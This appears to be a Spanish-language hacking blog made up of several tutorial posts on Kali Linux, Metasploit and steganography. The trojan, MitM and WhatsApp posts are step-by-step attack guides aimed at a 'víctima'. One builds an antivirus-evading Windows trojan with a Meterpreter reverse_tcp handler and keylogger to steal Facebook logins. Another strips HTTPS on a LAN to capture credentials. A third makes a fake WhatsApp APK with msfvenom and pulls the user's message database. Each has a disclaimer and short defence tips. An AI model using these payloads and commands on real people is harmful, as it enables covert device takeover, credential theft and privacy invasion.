:::: MENU ::::
  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

martes, 28 de junio de 2016

Muy buenas!

En este post se mostrará otra de las formas para obtener los credenciales de Facebook de una persona que esté dentro de nuestra red, es decir dentro de LAN. Para eso vamos a utilizar un Ataque de Hombre en el Medio (MitM).


Imagen de http://hearme.fm/


Este ataque lo usan muchos hackers (En este blog se tratará de hackers en término general, cada uno adaptará el significado al contexto en que se esté hablando), para obtener contraseñas de personas sin que se den cuenta, primero captan una red (Por ejemplo una red WiFi)  y la crackean (Obtienen su contraseña) para poder tener acceso a ella y después aplicar este ataque y robar contraseñas de los usuarios que están conectados a la red.

Por eso hay que estar muy atentos a quienes están conectados a nuestras redes, y revisar constantemente en el router para observar si hay alguien extraño que a accedido a nuestra Red.

¿Qué es un ataque MitM?

Un ataque Man in the Middle (MitM en sus siglas en Ingles), también conocido o traducido al Español como Ataque de El Hombre en el Medio, es un ataque Pasivo (No es intrusivo y no implica dejar rastros en un sistema, es decir, es "silencioso").

Lo que hace este ataque es interceptar los mensajes entre dos partes (Host por ejemplo) y leer, insertar y modificar a voluntad, los mensajes entre ellas sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado (de ahí a que sea pasivo pillo).

Osea, con este ataque podemos monitorizar el tráfico que deseemos de una red, entre host.

Será necesario:

* Estar conectado a una Red, y que en esta haya al menos un usuario conectado para interceptar su tráfico.
* Tener la herramienta Yamas instalada en su Kali Linux (En el procedimiento se verá su sencilla instalación). Se puede descargar desde aquí. (Deberán descargarlo con Kali Linux, sino en Windows les mostrará el código del programa).
* Paciencia, okno ve y tómate un refresco mientras ves tu ataque rufian.

Procedimiento:

Vamos a tener el archivo descargado en nuestro escritorio, abrimos una terminal y vamos a ubicar los siguientes comandos para instalarlo:

cd Escritorio
chmod +x yamas.sh
./yamas.sh


Dan Enter y lo instalan, a las preguntas que les aparecerán pongan Y, y den enter.
Cuando estén en esta pantalla ya pueden cerrar la terminal. Ahora cuando abras una terminal y pongas yamas se te activara como un complemento más de la terminal.
Les saldrá esto:


Aquí le darán.

Enter
Enter
NombreCualquiera y dan Enter
192.168.1.1 → Esta será la puerta de Enlace Predeterminada en el Router.
Enter
Enter


Tendrán esto al final.


Ahí se mostrarán las credenciales que hayan puesto las personas que han accedido a la red y que estén usando un Navegador vulnerable a ese ataque, estas personas estarán siendo redirigidas desde un protocolo HTTPS seguro a uno HTTP, de esta manera podremos obtener sus credenciales.

LISTO!!!!!


¿Cómo me protejo de  este ataque?

* Fijarse siempre que la página en la que pondrán sus credenciales siempre lleva https no http.

* También que lleve un candadito de color verde (En el caso de Google Chrome).

* Tener una seguridad WPA2/PSK con Cifrado AES y una contraseña bastante buena con letras, numeros y caracteres diferentes.

* Tener actualizado los navegadores web.

* Sentido Común!!!!


IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.


* Las imágenes han sido de elaboración propia.

- Cuculmeca

















lunes, 27 de junio de 2016

Es normal al hablar de Metasploit, encontrarnos con que este se trabaja usualmente en distribuciones dedicadas mas que nada al Pentesting o Hacking Ético.


Sin embargo es posible instalar Metasploit Framework para trabajarlo en Windows (Incluso en Smartphones android por ejemplo), ya que es multiplataforma. En este post de indicará de manera sencilla cómo instalar Metasploit Framework en Windows para los que no desean tener una distribución de pentesting o que simplemente quieren aprender a instalarlo en el sistema Operativo mas usado por usuarios de casa.

Primero necesitaremos:

* Metasploit Framework para Windows, este se puede descargar normalmente en este Link http://windows.metasploit.com/metasploitframework-latest.msi.
* Una PC con Windows.
* Una imagen .ico de metasploit, esta se puede descargar de Aquí.

Procedimiento:

Cuando descarguemos el Metasploit vamos a abrirlo y aparecerá lo siguiente:


Vamos a aceptar los términos y le damos en Siguiente:


Le damos en siguiente y luego en Instalar, vamos a esperar un momento.


Ahora que termine de instalar vamos a la carpeta de Instalación del Metasploit, si no la cambiaste estará en C:/metasploit/, aquí vamos a crear un acceso directo del archivo dev_msfconsole.dat o en su defecto msfconsole.bat (Me encargué de llevar el acceso directo a una carpeta), vamos a Propiedades del acceso directo y le cambiaremos el icono (Si aparece una ventana de que el archivo no tiene icono, solamente denle aceptar)



Aquí buscaremos el ícono que descargamos en la parte de arriba, y se lo vamos a asignar, de esta manera, aceptamos los cambios y tendremos completado la Instalación correcta del Metasploit en Windows.



TERMINADO!!!!
Ahora ya se pueden utilizar las herramientas que nos proporciona Metasploit en Windows.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

* No me hago responsable de los daños que le puedan dar a su PC el uso de estas herramientas, todo esta bajo su responsabilidad.

* Es recomendable tener todas estas herramientas en una VM.








viernes, 24 de junio de 2016

Hola a todos, en este post vamos  a ver algo de Esteganografía, este es el segúndo post de esta temática en el Blog, si quieres ver el primer post de Esteganografia para aprender a ocultar información dentro de Imágenes puedes ir Aquí.


A los que han visto la serie de Mr. Robot se les hará curioso que Elliot (Protagonista de la Serie) escondiera la información de las personas que hackeba dentro de Audio, y luego este incluyera el audio en unos CD's de tal manera que así nadie sabría que todos esos cd's de música contenían información muy privada de las personas que él mismo hackeaba.

Aquí les dejo un Trailer de la serie, que es demasiado buena y es de las únicas series que si es aceptada por los hackers reales.


Y ¿por qué no?, un vídeo que muestra un poco mas sobre la serie. (Enserio que se las recomiendo, ya está en latino en la Web)



Pues bien, ahora sabremos cuál es la herramienta que usaba Elliot para esconder información en esos CD's de música.

Manos a la obra entonces!

Requerimientos:

* Necesitarás un archivo de audio (Puede ser una música) donde vas a ocultar la Información, si lo sé, eso era tan obvio.
* Seguimos con lo obvio vamos a necesitar un archivo que queramos ocultar dentro de la música, que no sea muy pesado.
* Lo más importante necesitarán el siguiente Software: http://ouo.io/rXSBeA
* Una Coca Cola (No es necesaria, pero sería muy delicioso hacerlo mientras te tomas una).

Procedimiento:

Primero tendremos los archivos en una carpeta, de esta manera lo tendremos mas ordenado, y no nos vamos a perder buscando y haciendo esas cosas innecesarias.


Ahora vamos a abrir el programa DeepSound y arrastramos la música en la que vamos a esconder la información.


En el caso que no lo tengas todo en una misma carpeta, u otra razón puedes irte donde está el botón de Open Carrier Files, luego seleccionas la música buscando en tu PC.


Bien, ya tenemos la música, ahora vamos a irnos a Add Secret Files, ahí buscaremos el archivo que vamos a ocultar, en mi caso será una imagen llamada "holamundo.jpg"

Cuando la hayas añadido nos vamos a ir a Encode Secret Files, ahí las vamos a fusionar.

Un tip es Encriptarla con una contraseña con cifrado AES, tildando Encrypt Secret Files, y poniéndole una contraseña que nosotros queramos. Ahora le damos en Encode Secret Files y se nos creará un nuevo archivo de audio con el mismo nombre que el Original pero con el formato wav (A menos que se lo cambies).



La música con la información fusionada estará en la carpeta de Documentos, puedes ir ahí a buscarlo.
Listo!!!!
Ahí habremos ocultado información en una música al Estilo de la Serie Mr Robot, si das doble click a la música verás que se abre normalmente, pero te preguntarás. ¿Cómo hago para ver la información que le di?. ¡Pues muy fácil chicuelo!

Abrimos de nuevo el programa y le arrastramos la música con la información (La de formato wav), y verás que te pide la contraseña que le pusiste.



Listo ahora ya nos podemos sentir como Elliot muajajajajaja.

Bien, la música con la información suele quedar de un peso considerablemente mayor a la de una música real sin información, por eso es que para no levantar sospechas Elliot metia esas músicas en un CD, ya que ahí cuando lo abrimos mostrará un archivo de 1kb (Bien jugado Elliot).

IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

miércoles, 22 de junio de 2016

Hola a todos, vengo a mostrar algo que es bastante común, por naturaleza hay información que queremos ocultar, o queremos que pase de forma desapercibida por algún lugar, muchas veces nos preguntamos. ¿Cómo hacer para ocultar una información en una imagen cualquiera sin ningún programa?. 

Imagen de www.adslzone.net
No te confundas, la imagen dice Windows 10, pero se puede usar cualquier sistema operativo rufian. En este post se mostrará como responder a esa pregunta, vamos a crear un archivo que lo comprimiremos con WinRar, y lo anexaremos a una imagen que tengamos en nuestra PC, todo esto con una herramienta que el mismo Windows trae consigo.

Requisitos: 

- Una Imagen cualquiera (En la que queremos meter la información). 
- Los archivos, o la información que queremos ocultar en la Imagen.  

Procedimiento:

Primero vamos a ver que en una carpeta cualquiera tengamos los archivos necesarios.


El archivo que ocultaré va a ser un simple txt, osea un archivo de bloc de notas.
En este archivo he escrito por ejemplo "Hola a todos".
Obviamente yo solo lo hago con algo sencillo, pero ustedes pueden ocultar cualquier archivo que deseen.


Bien, cuando tengamos todos los archivos que deseamos ocultar, vamos a moverlos al WinRar que habiamos creado (Este WinRar se crea dando click derecho en cualquier parte de la carpeta y dando en Nuevo → Archivo WinRar)

Igualmente si no quieren crear el archivo WinRar de primero, simplemente pueden crear un archivo rar seleccionando todos los archivos que desean ocultar y dando click derecho → Añadir al archivo nombre.rar.

Aquí la imagen de ejemplo.


Ahora ya vamos a ir al símbolo de sistema.

En Windows 8/10: Das click derecho al ícono de Windows (Abajo a la izquierda), luego a "Símbolo de Sistema.

En Windows XP/7: Presionas las Teclas Windows+R, aparecerá una ventana de ejecutar, ahí se debe escribir "cmd", y darle en Aceptar.

Ya abierto, aparecerá una consola normalmente de fondo negro (A menos que se cambie).
Vamos a escribir los siguientes comandos.

cd ..
cd ..

Una imagen para mayor referencia.



Aquí deberemos pegar la ruta de la carpeta en la que están los archivos que vamos a fusionar, para ello debemos ir a la parte de arriba de la carpeta y copiar la dirección de la misma. (En realidad se puede acceder manualmente, pero se hará así ya que es mas rápido)


Lo copiamos y lo pegaremos en el cmd de la siguiete forma (En mi ejemplo).

cd C:\Users\AMD A10\Desktop\Vídeos de YouTube\[Windows] Cómo esconder información y archivos en una imagen

Se puede ver que primero estará siempre escrito cd, y luego lo que copiamos.
NOTA: Para pegar algo en el CMD no se hace con las teclas rápidas de Crtl+V, sino que se deberá hacer con Click Derecho y Pegar.

Entonces ya habremos accedido a nuestra carpeta en el cmd de Windows.


Ahora lo que debemos hacer es ubicar en el mismo cmd.

copy /b nombredelarchivo.rar + imagen.png/jpg Resultado.png/jpg

Aquí lo que hacemos es usando el comando Copiar ubicamos primero el archivo rar donde esta toda la información (A este recomiendo darle un nombre que no tenga espacios), luego viene un signo " + ", se anexa la imagen en la que esconderemos la información, y al final con un espacio se escribe el nombre de la imagen que llevará (Imagen + Información).

En mi caso he puesto lo siguiente:

copy /b Oculto.rar + Imagen.png Resultado.png

Windows nos dirá que ya está todo hecho.


Verás que se ha creado una nueva imagen, idéntica a la anterior, pero con un peso un poco mayor.

Esta imagen se abrirá normalmente como una imagen cualquiera, pero solamente tú sabrás que esa nueva imagen tiene información.

Aquí vemos la comparación de las dos imagenes: Imagen Real vs Imagen con Información.


Para acceder a la información que le hemos puesto a nuestra nueva imagen, deberemos abrirla con WinRar como muestra en la imagen.


Si se intentará abrir de otra manera, entonces solamente mostrará la imagen, sin información y sin sospechas.
Aquí se puede ver que se abre un archivo rar al momento de que usamos WinRar para abrir la imagen, y luego corroborar que el archivo dentro es el bloc de notas que habíamos creado.



IMPORTANTE!

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca

domingo, 19 de junio de 2016

Las personas usualmente descargan a diestra y siniestra, aceptan acuerdos (Sin leerlos) con las páginas de los programas que descargan, obviamente eso puede ser aprovechado por las mismas.

Este tutorial está disponible en video da click aquí para verlo.



En este post mostraré cómo hackear un facebook, la contraseña y el correo de la víctima, utilizando el metasploit framework y una herramienta que nos ayudara para crear un Virus Indetectable.

Primero antes que nada, en esta entrada se verá una herramienta poderosa que nos ayudará a crear exploits con el Payload windows/meterpreter/reverse_tcp, y se encargará de dejarlo lo más indetectable a los Antivirus Actuales, (tanto así que puedes escanearlo con el antivirus que tengas y tu antimalware de preferencia y verás que no lo detecta como Troyano).

El ataque que se llevará a cabo se hará dentro de la Red Local, osea, no se ataca a otra persona que esté fuera de mi LAN. Este ataqué si se puede llevar a cabo fuera de la Red local, y es precisamente de esta manera que lo llevan a cabo los hackers para infectar PC's de todo el mundo, es decir, independientemente que estén en su red o estén del otro lado del mundo.

Vamos a ver los Requisitos:

* Necesitamos tener Mermaid, que será el Software Gratuito que utilizaremos para la creación del exploit que infectará a la Víctima, lo podemos descargar en el siguiente enlace: http://shink.in/yzUr6

* Obviamente necesitaremos Kali Linux, con este entraremos en la consola Metasploit, para abrir un handler de escucha a nuestro exploit con los parámetros que le demos al momento de crearlo.

PROCESO:

Primero vamos a descomprimir el archivo Mermaid.rar que descargaron en el link de arriba.
Vamos a ver dos carpetas y algunos archivos, procederemos a abrir el archivo con la Extensión de Java, (.jar). Por tanto abrimos el archivo Mermaid.jar, y si nos aparece un cartel le damos en Aceptar.



Con el programa abierto vamos a darle en el Símbolo +, ahí agregaremos un nuevo "Perfil", donde ubicaremos las configuraciones de nuestro Payload, puertos y demás.

Así que en el primer cuadro de texto pondremos el nombre del perfil que tendremos, este puede ser cualquier nombre.

En IP/DNS vamos a ubicar la IP Local Privada del Kali Linux, esto es importante, para saberlo, primero ir a revisar el Kali Linux, abrir una consola dentro del mismo y ver la IP Privada con el comando ifconfig. Si no te queda claro, te invito a que veas los otros exploits creados en este blog con Kali Linux, así verás dónde ver la IP Local del Kali Linux.

En PORT vamos a poner el puerto que vamos a utilizar, en todas mis pruebas le pongo 7000, puede ser cualquier número, menos un número de puerto que sea utilizado.



Ahora en la pestaña siguiete vamos a ubicar en la parte de abajo el nombre que tendra interiormente la Aplicación, puede ser cualquier nombre, pero tiene que terminar en .exe.


Ahora procedemos a darle Save.

Verás que se a creado un perfil con el nombre que le hayas asignado, este estará en la parte en blanco del Mermaid, ahora le damos click y le damos al Botón BUILD.

Ahí, puedes tachar el recuadro de UPX si lo deseas, esto lo que hará es reducir un poco el tamaño del archivo que estamos generando.

Le das click en los tres puntos suspensivos, para elegir el lugar donde va a quedar el archivo que estamos creando (El virus), hay que guardarlo con la extensión .exe.



Ahora tendremos el Troyano creado.



Creado entonces podemos subirlo a Mega o a otra página de descargas que nos deje subirlo.
Ahora nos vamos a Kali Linux para encender el Handler de Escucha.

En Kali Linux vamos a abrir una nueva consola y vamos a poner esta secuencia de comandos.

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set lhost 192.168.1.10 → Esta tiene que ser la IP que le asignamos cuando lo creamos, que es la misma que la IP privada del Kali Linux.

set lport 7000 → Este es el puerto que especificamos cuando creamos el virus.

exploit

Ahí vamos a esperar que nuestra víctima abra el Virus que le hemos enviado, esta es la parte dificil aunque podrás convencerla con el método que prefieras, en mi caso lo estoy haciendo sobre una de mis máquinas viruales, específicamente en una Windows 10.



Cuando la víctima de doble click sobre el virus que le enviamos, inmediatamente se nos abrirá una sesión Meterpreter.

Eso era exactamente lo que queríamos, ahora tenemos control de su PC remotamente, la persona no sospechará ya que ni el Firewall, ni el Antivirus ni el Antimalware que tenga le detectará algo raro en el archivo que le enviamos.

En la pantalla de la víctima no aparecerá nada al ejecutar el archivo, así que pues es posible que llegue a borrar nuestro virus al ver que no funciona para nada esa aplicación, así que lo que recomiendo es fusionar ese virus con algún archivo real (Una imágen, canción, pdf) de esa manera la víctima abre digamos el archivo PDF, y al mismo tiempo y sin darse cuenta abre nuestro troyano.

En este caso, nos simplificamos la vida, y suponemos que descarga el virus y lo abre y de ahí no pasa nada mas.



Ahora, para obtener los credenciales de la persona podemos hacer varios métodos, en este caso abriré un Keylogger sobre la PC víctima para tener control de TODO lo que esta persona, así, si esta persona escribe algun correo o contraseña con su teclado, nosotros lo tendremos capturado.

Entonces en Kali Linux abrimos el Keylogger con:

keyscan_start

Podremos esperar mucho y luego ver todo lo que ha escrito, o podremos estar dando constantemente:

keyscan_dump

El comando anterior nos mostrará lo que la víctima haya escrito desde que abrió el Virus.
Veamos por ejemplo que la víctima nos dio su correo y contraseña de alguna plataforma, en este caso Facebook.



En este ejemplo cuando damos keyscan_dump, obtenemos lo siguiente.

facebook.com <Return> micorreo<Crtl> <Alt> <LCtrl> <RMenu> qcorreo.com <Tab> micontrase'a

Vamos a interpretar esto para saber que es lo que escribió.

Primero, al parecer escribió en Google "facebook.com", luego de esto a dado Enter.
Después de eso escribió "micorreo" y dio las teclas necesarias para poner @, si ves luego dice qcorreo.com, esto significa primero que la "q" es parte del @, (Para escribir @ se usa normalmente Alt + Q), y luego escribe correo.com.

De esta manera su correo electrónico es: micorreo@correo.com

Luego presionó TAB, esto indica que se movió de cuadro, para escribir en otro cuadro de texto, vemos que escribió: microntrase'a.
Sabemos que en el teclado de Estados Unidos no existe la Ñ, así que ese ( ' ) que vemos, es una ñ.

De esta manera su contraseña es: micontraseña

Hemos conseguido obtener la contraseña y correo de una persona que utilizó facebook, ahora podemos usar.

keyscan_stop

exit

exit

exit

Primero apagamos el Keylogger, y nos salimos de la consola meterpreter, ya hemos terminado.


Pruebas de Antivirus en NoDistribute.

Solamente 1/35 antivirus lo pudo detectar.
Sin embargo si no le activamos el UPX al momento de crearlo (El UPX es para bajar el peso del virus), si lo desactivamos esta prueba será de 0/35, osea que ningún antivirus lo detectará.


¿Cómo nos podemos proteger de estos ataques?
* No descargar aplicaciones o programas dudosos.
* No instalar aplicaciones o programas de sitios de dudosa reputación.
* Tener un buen suit de protección de Windows (Firewalls, Antivirus etc...)
* No entrar a páginas raras, o con una dirección url extraña.

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi PC y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

miércoles, 15 de junio de 2016

Puedes descargar esta guía completa para verla sin conexión en cualquiera de tus dispositivos compatibles con Microsoft Word desde aquí: http://ouo.io/w6sK5

WhatsApp una aplicación de mensajería donde podemos interactuar con seres queridos y no tan queridos enviando y recibiendo mensajes. fotos, vídeos etc...

Las conversaciones que tenemos día a día con personas por medio de esta aplicación de mensajería además de verse dentro de la misma aplicación, quedan guardadas en archivos encriptados dentro del teléfono, en una carpeta predeterminada por WhatsApp.

Si por curiosidad queremos obtener la base de datos encriptada de WhatsApp para ver nuestras conversaciones en la PC personal, entonces nosotros podríamos acceder directamente a ella navegando en nuestro celular hasta la ruta en que se encuentra el archivo encriptado.

Sin embargo, algunas personas mal intencionadas pueden robar esa información de tu Smartphone sin que te des cuenta, si instalas alguna aplicación que conceda demasiados permisos.

A continuación mostraré un método para acceder remotamente a esa base de datos desde Kali Linux.

Empecemos! Con las fechorias.

PROCEDIMIENTO:

Primero antes que nada puedes descargar esta guía: http://ouo.io/EPokCW de mi post https://cuculmecakali.blogspot.com/2016/06/android-obtener-contactos-y-mensajes-de.html De esta forma verás de manera mas prolija como se crea el exploit (Muchas más imágenes y explicación de algunos parámetros que pondremos)

Primero en el Kali Linux abrimos una consola y ponemos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R > /root/Desktop/AplicacionWhatsapp.apk

En otros post mostraré como utilizar otros payloads, no sólamente con meterpreter.

Para saber qué poner en lhost deberás abrir otra terminal y ubicar:

ifconfig


Lo subimos a un servidor:
En mi caso lo subo a Mega.nz
Ahora, en la misma terminal abrimos una consola Metasploit con:

msfconsole



Pondremos:

use exploit/multi/handler

Ubicamos los parámetros del exploit que habíamos creado anteriormente.


set PAYLOAD android/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 7000

Además después de eso poner show options para observar que los parámetros están bien escritos y si nos falta algo mas.


Abrimos la escucha del Handler con:

exploit

Esperamos que la víctima instale y abra la aplicación (Para eso tendrán que convencerla que la instale y ejecute), cuando eso suceda entonces se abrirá una sesión Meterpreter.

Ahora van a ubicar:

cd /

Omitan lo que dice "Exploit" arriba, fue un error de parte mía.


Luego de ubicar cd /, van a poner:

ls

ls lo que hace es listar todo lo que esté contenido en la carpeta actual, entonces al ubicar ls, nos mostrará lo que esté en la raiz del sistema de Android (Carpeta que accedimos con cd /). Serán muchísimas carpetas.



Nos meteremos en la Sdcard, y luego listaremos lo que está dentro, con:

cd sdcard
ls


Obtendremos una cantidad enorme de archivos y carpetas, ahora nos interesa la carpeta de WhatsApp y listar lo que está dentro, por tanto utilizaremos.

cd Whatsapp
ls

OJO que hay que respetar siempre mayúsculas y minúsculas.

Obtendremos las carpetas dentro de WhatsApp, como se ve en WhatsApp hay una carpeta llamada "Databases", esa es la que contiene los archivos encriptados de los mensajes, por tanto accederemos a él y listaremos su contenido.

cd Databases
ls


Dentro estarán unos archivos encriptados por Whatsapp, en este caso están en crypt10, en el dispositivo que estén tratando puede variar.
Lo que necesitamos es descargar esa base de datos a nuestro Kali Linux, por eso utilizaremos.

download "AQUI ESTARÁ EL NOMBRE DEL ARCHIVO QUE DESCARGAREMOS"

Como se ve en la Imagen:


Entonces ahí tendremos la base de datos de WhatsApp de una persona.
Esas bases de datos estarán en la Carpeta Home de Kali Linux.


En un próximo post veremos como desencriptar esa base de datos, es decir la Crypt 10, (Aunque puede ser desde la Crypt 5 hasta la Crypt 12)

TERMINADO!

¿Cómo evitar estos ataques?

* No descargar aplicaciones dudosas.
* No instalar aplicaciones de sitios de dudosa reputación.
* Leer atentamente los permisos que se le dan a las aplicaciones.
* Tener un buen suit de protección de Android (Firewalls, Antivirus etc...)

* Tener WhatsApp actualizado, las nuevas actualizaciones brindan mayor seguridad a la base de datos, por lo tanto a los hackers se les hace más difícil su desencriptación.

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca
A call-to-action text Contact us